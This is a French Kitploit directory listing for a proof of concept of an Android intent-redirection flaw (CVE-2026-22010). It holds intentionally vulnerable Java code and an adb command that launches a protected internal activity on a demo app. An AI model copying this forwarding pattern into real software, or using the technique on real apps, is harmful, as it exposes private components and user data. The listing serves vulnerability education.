Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component — Preuve de concept pour la redirection d'intents Android CVE-2026-22010 : démontre une activité exportée transmettant des intents vers des composants internes contrôlés par l'attaquant, contournant les contrôles de permissions, avec un code Java vulnérable et des étapes d'exploitation via adb. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component
Sécurité AndroidAnalyse des VulnérabilitésExploitationPentesting d'Applications MobilesSécurité MobileApprentissage et Éducation
GitHubgeorge0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component

CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
1il y a 16 joursPas encore vérifié

À propos

Preuve de concept pour la redirection d'intents Android CVE-2026-22010 : démontre une activité exportée transmettant des intents vers des composants internes contrôlés par l'attaquant, contournant les contrôles de permissions, avec un code Java vulnérable et des étapes d'exploitation via adb.

Partager

CVE-2026-22010 – Redirection d'Intent Android vers un composant exporté

Code du programme (simulation Java/Android)

root@kitploit:~
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
    @Override
    protected void onCreate(Bundle b) {
        super.onCreate(b);
        Intent incoming = getIntent();
        // Retrieve target component from extras
        String targetPkg = incoming.getStringExtra("pkg");
        String targetCls = incoming.getStringExtra("cls");
        Intent forward = new Intent();
        forward.setClassName(targetPkg, targetCls);
        // Copy all extras from original intent
        forward.putExtras(incoming);
        startActivity(forward);
    }
}

CVE-2026-22010 – Redirection d'Intent Android vers un composant exporté

Severity: High

Aperçu

Une activité Android exportée redirige aveuglément les intents entrants vers un composant spécifié dans les extras de l'Intent. Un attaquant peut créer un Intent qui amène l'application à lancer une activité interne protégée avec des données contrôlées par l'attaquant, contournant ainsi les contrôles d'autorisation.

Détails de la vulnérabilité

  • Type : Redirection d'Intent / Contournement d'autorisation
  • Impact : Accès à des composants privés, vol de données.
  • Cause racine : L'application ne valide pas le composant cible (nom du package et de la classe) avant de transférer l'Intent.

Démonstration de l'exploit

Déployez l'application vulnérable sur un émulateur Android. Envoyez un Intent via adb :

root@kitploit:~
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity

L'activité interne se lance sans les autorisations appropriées.


Télécharger l’outil